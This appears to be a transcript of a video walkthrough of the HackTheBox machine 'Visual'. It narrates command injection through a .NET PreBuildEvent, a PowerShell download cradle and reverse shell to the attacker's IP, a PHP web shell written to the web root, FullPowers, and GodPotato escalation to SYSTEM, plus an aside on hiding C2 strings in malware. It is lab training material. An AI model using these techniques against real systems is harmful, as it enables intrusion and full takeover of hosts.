What's going on YouTube? This is Ipsec. I'm doing visual from HackTheBox, which gets its name because the web app is a service that remotely uses Visual Studio to compile .NET apps. So you can just upload your project file and then it will output the compiled binary. However, most compilers, including Visual Studio, have something called PreBuildEvents that let you run code before the compiler does, so you can sneak in command injection and get code execution on the box. Once you land on the box, you realize you're not the web user, so you switch over to the web user by dropping a shell in the web directory, and that enables you to get to a service that has the SeImpersonate privilege. However, it is disabled because you're just local service. You can use the FullPowers binary that uses a scheduled task, which restores all your capabilities, and that lets you get SeImpersonate, where you can use the GotPotato, which is the latest in potato attacks, to escalate to root. So with all that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it visual, then the IP address of 10.10.11.234. This can take some time to run, so I've already ran it. Looking at the results, we have just one port open, that is HTTP on port 80. Its banner tells us it's Apache running on a Windows server, which is a bit odd, and that it also has PHP. So this is definitely an odd combination for Windows. I'm used to it being IIS and not allowing PHP, but hey, let's just go check out the website. So I'm going to do HTTP, then the IP address of 10.10.11.234, and the banner tells us, welcome to Visual, a revolutionary approach to Visual Studio project compilation with Visual. So I guess the box's name is Visual because it hosts Visual Studio on the back end. And it also tells us they only support .NET 6.0 and C# programs, so make sure repo includes a SLN file, which is a solution file for successful compilation. And scrolling down a little bit, it wants us to submit our repo. So what I'm going to do is stand up a web server real quick because I want to see what the request it makes back to us, right? So I'm going to do python 3-m http server. And then I'm going to say a repo's 10.10.14.8.8000 because that's where the HTTP server is listening. And then we'll say ipsec and test because a lot of Git likes username and then project. So I want to make sure my thing obeys that naming convention. And then we see a build is being compiled. Please be patient. And then looking back here, we just see nothing yet. So I'm going to give it some time. I like just waiting like a minute to see if anything happens. I'm guessing it's going to happen before that minute's up, but we'll see. And the main thing I want to see is, does it just make a request to the .git folder and then pull the Git file? Or is it going to use a different form of the Git protocol? Because that's going to tell me what my next step is. If it's just going in the .git file and then pulling the repo that way, then I can just build a repo and host it on this HTTP server. If it does it through other methods, I'm going to stand up my own Git repository for it to work. And we can see the request does come in. And we have it making a refs and it says the service is Git upload pack. So this is actually taking advantage of a Git service, right? So my first thing is I just want to Google this to see if it's like standard RFC or specific to maybe GOGS, Gitea, GitLab. There's a lot of various Git repos, right? And this just looks like it is going to be standard Git. So we can stand up any type of repository on our own. And the easiest one, I think, is always going to be Gitea or GOGS. If I just do Gitea Docker Hub, it will give us how to install it with Docker. And I love using Docker for things like this because it just makes life so easy. We don't have to like host anything on our box. And well, we host it on our box, but we don't mess up our file system because it's all in a container. So that way, if we screw things up too much, we just delete the container and move on with our lives, right? So I'm going to do a Docker pull Gitea because that's where the image was. I already have it, so it went really quickly. So now all we have to do is a run. So if I do Docker run, I'm going to do -d so it starts detached. I'm going to then do -p, port 3000, 3000. And what this is going to do is listen on my local host and forward it to 3000 in the container, which is the default port Gitea runs on. You could probably get that from here as well. In this Docker compose file, they're exposing 3000. And they're also exposing port 222 to 22. And the reason why these are different is because your local box probably is already listening on 22. So they do 222, so it doesn't conflict with the SSH on your box, right? And that goes to the containers 22. So if we run this, I'm also going to add a --rm. So as soon as I stop this container, it deletes the image because we don't need to store any of the files. We see it just gives us the hash. And now if I do localhost port 3000, we have a Gitea instance. I'm just going to click install Gitea, and then we can register an account soon as it's up, right? We have it loading there. We're at user login. Let's create our account. I'll say ipsec root at ipsec.rocks, password of password. Then we register the account, and now we're in. So all I have to do is create a repository now. And I'll create this name, please subscribe. Create it. And then if we do a git clone here, we have our repo, right? So the next thing it wanted us to do is create a .NET project file, right? And my box is kind of lucky because I already had .NET installed and it's version 7, which the server did have. But if you were to do this now, you may install .NET 8, which would not work on the server. And it's a real pain to manage multiple versions of .NET just locally. There's probably a good way to do it. I don't really know how. The easiest way I know is to use Docker, right? So I want to install a Docker container that's only using .NET 6 because that's what the website tells us. But if you had .NET 7, it would also work. Probably .NET 2 through 5 would also work because it's backwards compatible. But let's just do Microsoft Docker .NET 6.0. Let's see what this does. Let's see, .NET runtime. Let's see. There we go. So we can do this Docker pull command. And my box already says I have it. So it just went quickly. It'd probably take a minute for you. And since we have this runtime now, we can do a Docker run. And then I'm going to specify -it for interactive. Then I'm going to do -v for volume. I'm going to share my current working directory with /mount. Specify, oh, did not want to do that. Let's copy this. Then we want to say the runtime 6.0. And then I think I just do bash and it'll put me at a prompt. There we go. So here I have my container. If I go to /mount, it's shared with my host right now. So what that's going to allow me to do is all the .NET commands to make a project, right? So the first thing we want to do is .NET new console. Command not, .NET console new. .NET help. That is weird. CD .NET new console. No .NET SDKs were found. I'm in the .NET container. Docker images. So instead of doing the runtime, we want to do the SDK. So when you went to the poll, replace runtime with SDK, and that should work. So if we do .NET new console here, there we go. That SDK is software development kit. Runtime is just so you can run .NET applications, right? So it makes sense why we needed the SDK. So now that we have the project, we can cat it to see what this looks like. It's just going to point us to .NET 6.0, and then the program.cs file is just a hello world. If I do .NET run, it will compile this application and run it. Awesome. The next thing we need to do is make that SLN file because the website tells us we need it, the solution file. So if I just do .NET new SLN, it says the solution file was created. And if I just cat it, it doesn't tell us, it doesn't link to our current CS project file, right? So what we want to do is say .NET SLN help, and it's going to say we want to give it the solution file, then we can do add and give it the project file. So let's do .NET SLN, the SLN file, which is mount.sln. I probably should have made this a different name. It's just taking the mount because that's the directory we're in, but it doesn't really matter what the name is. It's just going to be a little bit confusing. So what we did is give the SLN file, add the CS project file, and we see it has been added to the solution. So now if I go to my please subscribe directory, we have the Visual Studio directory. I'm going to make a get ignore file, and we're going to ignore bin and object because those are just there because I did the .NET run command, right? We could show that real quick. So if I do rm-rf bin and obj, those don't exist, .NET run, and it's going to create those directories. And like bin, we see that's where the executable actually exists, right? I think it's in mount. It's probably this is the executable, I'm guessing. Let's do a file against it. We don't have that. We can just do it on our host. Debug elf. Oh, it's an elf file because we're on Linux. I did not expect that. I thought it was going to be an exe. Mount.csproj. Our format is exe. Find .-name star.exe. I guess it made an elf file. I don't think that matters too much. So let's see. The next step we need to do is get add dot to add all the files to the Git repo. We can commit, give it the message. Doesn't really matter here. I'm going to say initial commit. Then we can git push and then put our git t credentials. And now on git t, all the files will be here. So if I refresh, we have our project. We have the solution file, the CS project file, and program. So now let's copy this. And then we'll go back here and do HTTP 3000. Then IPsec, please subscribe. And before I do that, I want to get logs of our Gitea instance. So if I do docker logs b25c7 8 b257 45, there we go. This is going to give me standard out of this container. So I'm just going to do a -f to follow, hit enter a few times, and then we're going to send this. And we can wait probably a minute for the server to make a request to us. And I guess while this goes, we can talk about what the next step is because it kind of takes some time. The project file is going to tell the compiler what to do. And there are some dangerous options in this. Whenever you open like a project from somewhere you don't trust, it asks, do you trust this repository? Because if you don't, it's not going to run a lot of the things. One of the most dangerous ones is called a PreBuildEvent. I'm just going to Google prebuildevent.net, and that should get me to what I want. Let's see. Here's the documentation. And let's see what it is. So this is how you can do call it. So we give a target name, prebuild, prebuildEvent. We could also do it without the target. So we could just call it like in the property group. This says read only. Let's get out of here so it's not read only. Maybe I could do sudo v mount.csproj. Okay, so now I can write. So if I do PreBuildEvent, we can run a command here. So I'm just going to say touch pwned. And we're going to end it PreBuildEvent like this. And then if we go back to the Docker container, and we can see the web server made a request to us. We'll look at the output of the web server in just a minute. But back on the Docker container, if I look at this, there's a prebuild event, right? So if I do a find / name, did I call it pwned? Yeah, I did. Pwned. That doesn't exist anywhere, right? So now I'll do .NET run, and it's going to print hello world. I do -name pwned. It now exists because it ran this before it built. And you may think this is like a vulnerability. What is a legitimate use case for this? And there's a lot of times when you just want to do things before. For instance, I mostly use this when writing like C2s because if I'm not using a malleable config, if you don't know what that is, just go to ipsec.rocks, type malleable config, and watch that video. But let's say I'm creating a file and I have config.h. I really hate Docker sometimes because it doesn't have v. I could like define a variable, let's say decryption key, and I want this to be encrypted, right? But I don't want to like always put that encrypted text here. I want this to be easily changeable, right? So what I would do is just leave that blank and then put a comment here. And then I could say decrypt and then the plain text here. So I would have a pre-build event of bash, PowerShell, whatever, looking for all comments that have decrypt : and then text. And then what it would do is, oh, I see this plain text. Now I'm going to put the encrypted value here. And of course, the compiler is always going to remove all comments so that doesn't make it into the executable. And what you're left with is just a bunch of encrypted things. And decryption key is a bad one. We could say like C2 URL or something, right? And that way, you don't have plain text strings in your executable because the pre-build event takes the plain text and always puts the encrypted value in there, right? And I know what you're thinking now. That's not really a legitimate use case because we're using this for malware, right? Well, I do like a lot of gRPC stuff with Golang, and that's another time where I would use this, right? I think I have an example here. Let's see, proto example. So in Golang, if you do like gRPC, you're probably used to having these protobuf files, right? And this is just a simple config that you run through a program to create essentially a header file that gives you a lot more functions, right? This is going to stand up a RPC service named greeter, and then it has two functions, say hello and say hello again. And hello is going to take in a hello request, which has the variable name, hello again, pretty much the same thing. And that's how it returns, right? Hello reply. So what we do here is we just do proto-c and then give it the proto file. And I think go out. There we go. Thank God it did not error. And that automatically generates this code. So if I do a less against it, we can see it's creating a bunch of magic for us. We have like the reset function, the string. It just is a lot of code here, right? And every time the protobuf file updates, we have to run that proto-c command. So if we just wanted to have the program compile the proto-c command before building the Go program, we would use a pre-build event, right? So that is one of the more legitimate use cases for it. Hopefully that all makes sense and you enjoy that tangent. Always let me know in the comments if you do. So let's see, where were we? Okay, we want to see what the website said. So it says your build failed. Here are the lines with errors. If we go to toggle code, scroll all the way down, let's see. So it looks like it actually wants something in the object. So what I'm going to do is undo the git ignores and just give it this object directory because it's trying to get this project asset.json file. I'm guessing maybe this requires internet or something, and it needs it. The other thing I'm noticing is the SDK is 7.0, so maybe I want to switch to 7 instead of 6. But first things first, let us just, edit that git ignore. That's what I want to do. So I'm going to remove the object git add dot git commit -m add obj dir git push, and we can see we added that project assets.json, which it was looking for. And now we will go ahead and redo this, right? If we go back here, it already saved, submit it. And then I'm going to hit enter a few times so we know when the server hits us. And I think I can exit the Docker container. I don't think I need it anymore. So let us now edit the mount CS project. And we want to run a more dangerous command than pwned, right? So what I'm going to do is copy. Let's do copy user share nishang shells invoke. Is it PowerShell TCP one line.ps1, and I'm going to put it in dub and call it rev.ps1. Okay. And let's edit this. And I take this one line and we want to put our IP here. So 10.10.14.8, 9001, because that's where the shell is going to listen. And then what I'm also going to do is use a web cradle to access this file. We could just cat rev.ps1 I convert to UTF-16 little endian, and then base64-w0. I thought we could. Let's see. Fail to convert. Why? I convert -t UTF-16 little endian. Okay, there's no dash there. I thought there was UTF-16-LE, but maybe not. And the reason why I do this is how PowerShell likes encoding. We could do base64-w0 and pass this as the encoder command. The reason why I'm not and want to use a web cradle is if Defender flags this, I'll never know. But if we use a web cradle, then the server will make a request to us. And if we don't get the shell, we know Defender probably stopped it, right? So I like having the server reach back to us first. That way we know if we're getting flagged by antivirus. So let's do a, I'm just going to do it in a file. So we'll call it web cradle. And we can say ix new object net.web client download string http 10.10.14.8 8000 rev.ps1. I can't remember if I want this in double quotes or single quotes. I think single quotes would be just fine. So let's do a cat command again. We'll do the web cradle. There we go. Copy this. Go to our CS project file. And then we can say this. We have to do this with sudo. I should just like take ownership of this file so we no longer have to. So we can do PowerShell-enc, the base64. And the whole reason why I'm using base64 here is I hate dealing with a bunch of quotes and things I don't know because they can break unexpected things. So whenever I can use base64, I like doing it. So now that we have that, oh, the code still errored even after we did it, or did we forget to push? Oh, so this time it errored because Windows doesn't know the touch pwned command. That's interesting, right? So we get the output of our command in that. So let's see what we want to do. Let's make sure we have this. That looks good. So I can say git add dot, git commit dash m, add malicious prebuild, git push. So now our latest is up there. Hit enter a few times. We can go back, hit submit, and then we want to stand up a web server. And I also want to listen on port 9001. So ideally, we should see a request come in, and then we would next see the shell. So let's see if that is what happens. There we go. We have it hitting our service. So the next thing, hopefully it makes a request to us. If it doesn't do that, then our issue is in the web cradle. Going back here, it still says our build is being compiled. So hopefully everything's working, but I'm starting to lose hope right now because I expected the web cradle to be hit. Well, it still says compiled, so maybe it takes a while to do the git pull and the clone. Oh, there we go. So we had it hit, and then we got a reverse shell connection here, right? So awesome. The one thing I wish I did was RL wrap this netcat command, so like I could clear the screen and do other things, but oh well. So if we do who am I, we're the Enox user. We could also do who am I /all to see what privileges we have and what groups we're a member of, and it doesn't really look like anything interesting here. Let's see, get process. Is that going to be PowerShell to do that? Let's see what we have. My main thing I want to do is see if Enox is the one running this web server. I'm guessing not, but let's see. Get process include owner. This should be it. Let's see. Get process. So if we do get process and specify, it was like Apache, right? HTTP, there we go. HTTPD, like that. And I'm going to copy this command. Okay. Then we want to select object name. That's a process name. Image username. Convert to JSON. This is ugly using WMI, but let's try it. So if I echo earners now, I don't know if that worked. So I don't know. I don't think we can see who owns the process. We can only see ourselves. So we know Enox is running PowerShell, and SSM. This is non-sucking service manager. That is a funny name for like a legitimate thing. It's just like a service binary wrapper for Windows to make it easy making services, right? The non-sucking service manager. The first time I saw that, I was like, oh man, that is one troll name. But we see conhost and CMD. So by that logic, the HTTP server is running as a different user because we can't see the user. So let's see if we can escalate to that, right? So whenever I land on a web server, I want to see if I can write files. So I'm going to echo pwned.php, or let's echo a web shell. Let's do PHP like this, and we'll say PHP info like that to pwned.php. and we didn't error, and we can see we wrote the file. So now if I go to 10.10.11.234 pwn.php, we don't get anything, which is odd. We see the PHP tag, but it did not execute. And what's happening here is really odd. I wonder if it will work if I just curl this. We don't need any of that stuff. So I'll do curl 10.10.11.234 pwn.php xxd. And what we see is because we created this in PowerShell, it's going to be UTF-16 little endian encoded. And we also got these bytes here, which I don't think is screwing things up. But the Apache module is only looking for ANSI encoded things. So this null byte here is screwing things up. So when we create the pwn.php, we have to make sure encoding is right. So let's go copy our echo command again. And then we can say out file pwn.php and encoding ASCII. So now when I run this command, it gets a lot more output because it's no longer UTF encoded. And we have the PHP info output, right? So now if I just get rid of this view source and view it, that works. So whenever you're on Windows, if you're dropping a web shell and it's not working as you expect, it's probably going to be an encoding issue, right? So now we have PHP info. Let's actually just get a shell. It should be easy now. So let's do the echo command again. And then we can say system request cmd like that. Awesome. And then we'll write the out file just like we did before. Refresh the page. It's going to error because it says it wants the variable cmd and we did not supply it. So if I do cmd equals who am I, we are NT authority local service. If we do who am I /all, let's do it in view source. So line breaks are treated. It looks very similar to this, but because we're local service, we can actually escalate to get SeImpersonate privilege most likely. So let's get a interactive shell here real quick. So I'm going to go to a new pane, and this time I'm not going to forget to run rlwrap, which just improves the reverse shell slightly for Windows, right? It gives me the up and down arrows. So we listen on 9001. And then let's just use our web cradle again. Do we still have the web server up? We don't. Let's start it. And then if I cat please subscribe, mount cs proj, we can grab this PowerShell file. Okay. So we do cmd is equal to our one-liner. And then go back over here and we have a reverse shell and we're the local service user. So let's see, I'm trying to remember the name. Let's see, .NET, GitHub, full privilege. Let's see, that's not the name. Restore all privileges. Local service in quotes. There we go. FullPowers is what the name of this is. I'm sure if I searched hack tricks long enough, I would find a reference to it. But a lot of Windows pen testing is just knowing what tools are available to you. And what's happening here is when you're local service, Windows is downgrading your tokens so you don't have a lot of dangerous permissions. What this is doing is creating a scheduled task. Because when the scheduled task happens, then Windows for some reason doesn't downgrade your token to have less privileges, and you get them all restored back, right? So that's what this is just going to automate for us. So I'm going to go ahead and download FullPowers. Let's see, download, let's put it in, this box's name is visual. We'll put it right in www. Okay. And then I'm going to go to program data because this is normally world writable. And we can say curl 1010. We probably need to do HTTP 10.10.14.8, 8000. It's probably FullPowers.exe, and we'll name it FullPowers.exe. So if I do a dir, we have that binary. If I try to execute it, and then we do whoami/all, it didn't do anything, but something odd happened. I'm not sure if you noticed. So let's try this again. Let's do FullPowers.exe, and it starts the dummy thread. We create the scheduled task. We get the new token. We create a process as the user. We have this shell here, and then we drop back to PowerShell. So our shell is screwing something up. If we just use netcat for a shell, that would have worked for us, but I really don't like using netcat if I don't have to. And the default PHP shell I'm used to using, if we do user share lawnum PHP Reverse Shell, this one is only supporting Linux. As soon as you run the shell, it runs this command, and then it would crash because it doesn't support Windows. However, if we Google PHP Reverse Shell, I'm going to Google Ivan because that's the creator of it. I forget his exact handle, but this brings me to this reverse shell. And this is a much better reverse shell than it. He credits the original script here, but now it supports Linux, Mac, and Windows. So this is one I would definitely recommend saving because it's just a really nice reverse shell to have if you're on a PHP box. So let's download this file, and I'm going to rename it to rev.php. We did not rename it. There we go. And then we want to go to the bottom and say our shell is going to be 10.10.14.8, port 9001. Okay. Let's see. I'm going to do rl wrap nc lvnp 9001. And we want to get back to the web directory, right? Let's see. Where is it? Let's just run the command here. If I just restart this shell, we'll be in the HTDocs, so I can curl HTTP 10.10.14.8, port 8000, rev.php, rev.php. Okay, so let's stand up a netcat listener. And now all I want to do is hit the rev.php file I just uploaded. And we have a reverse shell here. And we're not in PowerShell, but this reverse shell is a bit better. I don't know exactly why the one-liner reverse shell doesn't work, but if I now run FullPowers, we see this time it doesn't say something after system32, and we do a whoami/all. We have the SeImpersonate privilege. I'm going to exit that. We can do, because I forgot to show right off the start, get it again. Whoami/all. We still only had those 3 privileges to start out, right? It's not like the PHP shell did anything differently other than how it gave us the shell. So execute this. And with SeImpersonate, privilege escalation is pretty simple. We just have to know the latest potato to use. It started out like, I don't remember all the potatoes. It seems like every year or two, a new one is created because Microsoft patches the method. I think GotPotato is the latest one right now. There's also, I think, local potato, which works. Like, there's just so many. There's like juicy potato. There was one after that. There's rogue potato. There's all these types of potatoes. But I'm going to use GotPotato for this. And let's see. We just want to download GotPotato. We'll say .NET 4. I'm going to rename it so it's a bit easier to type. And all we do is the command we want to run. So let's see, how do we want to do this? Let's go back to program data, and we can make sure in dub we have GotPotato.exe. And we're going to curl HTTP 10.10.14.8 8000 GotPotato, output it to a file, and then we execute it. And we say -cmd, and it says cmd/c and the command we want to run. So let's do a PowerShell one-liner again. Grab it from the CS project file. Grab this. Okay. And that should be it. We run it. It's hanging. And we failed because we're not listening on a port. So there we go. Now we're listening. And boom, we get a shell. Who am I? Now we're the system account. Over on this one, we were service, which isn't system. This one is local system. So now I can go users, administrator. It's in desktop probably. And we can get root.txt, right? So that is going to be the box. Hope you guys enjoyed it. Take care, and I'll see you all next time.